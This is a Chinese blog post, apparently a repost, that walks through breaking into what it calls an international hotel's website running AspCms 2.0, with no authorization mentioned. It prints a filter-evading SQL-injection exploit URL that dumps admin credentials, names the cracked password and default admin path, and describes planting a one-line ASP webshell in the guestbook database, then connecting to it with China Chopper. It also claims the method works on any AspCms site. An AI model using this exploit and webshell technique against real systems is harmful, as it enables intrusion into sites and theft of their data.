[滲透實(shí)戰(zhàn)]某國(guó)際酒店測(cè)試

這是某個(gè)國(guó)際酒店的網(wǎng)站,由于使用了AspCms 2.0,通過(guò)SQL注入我們很快可以拿下shell

此次測(cè)試中,由于網(wǎng)站限制了所有的讀寫(xiě)權(quán)限,由各種錯(cuò)誤,以及最后的小馬根本沒(méi)什么權(quán)限。

0x01 基礎(chǔ)信息:

簡(jiǎn)單看看指紋信息:

是ASPCMS的,通過(guò)一個(gè)通用SQL注入拿到管理員的賬號(hào)密碼:

EXP:

https://blog.dyboy.cn/plug/comment
/commentList.asp?id=0%20unmasterion%20
semasterlect%20top%201%20UserID,GroupID,
LoginName,Password,now%28%29,null,1%20%20
frmasterom%20%7bprefix%7duser

利用EXP直接獲得:

解密得到管理員

賬號(hào):admin

密碼:123456

0x02 深入測(cè)試:

后臺(tái)默認(rèn)為: https://blog.dyboy.cn/admin_aspcms/

登陸管理后臺(tái)

根據(jù)以前的添加模版的方法不可行,再多看幾下,發(fā)現(xiàn)整個(gè)網(wǎng)站是沒(méi)有寫(xiě)入權(quán)限的...

這里要提一個(gè)東西就是aspcms默認(rèn)的留言板數(shù)據(jù)庫(kù)路徑:
https://blog.dyboy.cn/data/data.asp

有的我們?cè)诹粞园辶粞砸痪湓?/p>

┼攠數(shù)畣整爠煥敵瑳∨≡┩愾
密碼:a
菜刀連接 https://blog.dyboy.cn/data/data.asp 即可

因?yàn)檎麄€(gè)網(wǎng)站都沒(méi)有寫(xiě)的權(quán)限,應(yīng)該這個(gè)網(wǎng)站之前就有被入侵的經(jīng)歷吧,所以做了限制,找到備份文件的地方,嘗試了一下,雖然顯示成功備份,事實(shí)上不能備份。

因?yàn)椴荒苤苯酉螺d備份文件,就直接訪問(wèn)備份文件,發(fā)現(xiàn)一個(gè)有趣的東西:

有一個(gè) execute 語(yǔ)句,大家應(yīng)該有所想法的

然后死馬當(dāng)活馬醫(yī),直接菜刀鏈接備份數(shù)據(jù)庫(kù)文件,猜測(cè)密碼為a,因?yàn)閿?shù)據(jù)庫(kù)文件比較大,所以每次的操作都會(huì)消耗較長(zhǎng)的時(shí)間

然后就這么就連上了...

前面也說(shuō)了整個(gè)網(wǎng)站都沒(méi)權(quán)限,雞肋shell一個(gè)。

0x03 總結(jié):

shell是否有權(quán)限不重要,aspcms的都可以這么黑盒測(cè)試

提供一下這個(gè) ASPcms 2.0 的源碼下載地址:

http://down.admin5.com/asp/73162.html

空閑有能力的朋友可以審計(jì)一下,ASP的我就會(huì)一句話[捂臉]...

原文地址: https://blog.dyboy.cn/websecurity/49.html

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 一套實(shí)用的滲透測(cè)試崗位面試題,你會(huì)嗎? 1.拿到一個(gè)待檢測(cè)的站,你覺(jué)得應(yīng)該先做什么? 收集信息 whois、網(wǎng)站源...
    g0閱讀 5,160評(píng)論 0 9
  • 關(guān)于Mongodb的全面總結(jié) MongoDB的內(nèi)部構(gòu)造《MongoDB The Definitive Guide》...
    中v中閱讀 32,316評(píng)論 2 89
  • 背景: 閱讀新聞 12C CDB模式下RMAN備份與恢復(fù) [日期:2016-11-29] 來(lái)源:Linux社區(qū) 作...
    陽(yáng)屯okyepd閱讀 3,860評(píng)論 0 7
  • [SQL注入攻擊] SQL注入攻擊是黑客對(duì)數(shù)據(jù)庫(kù)進(jìn)行攻擊的常用手段之一。隨著B(niǎo)/S模式應(yīng)用開(kāi)發(fā)的發(fā)展,使用這種模式...
    James黃杰閱讀 2,920評(píng)論 0 30
  • 1、數(shù)學(xué)完成老師布置的第二周作業(yè),遇到了難題--最后一題,并在反饋中聆聽(tīng)老師對(duì)這一題的講解。通過(guò)這一次作業(yè)我學(xué)到了...
    謝娜1011閱讀 267評(píng)論 1 0

友情鏈接更多精彩內(nèi)容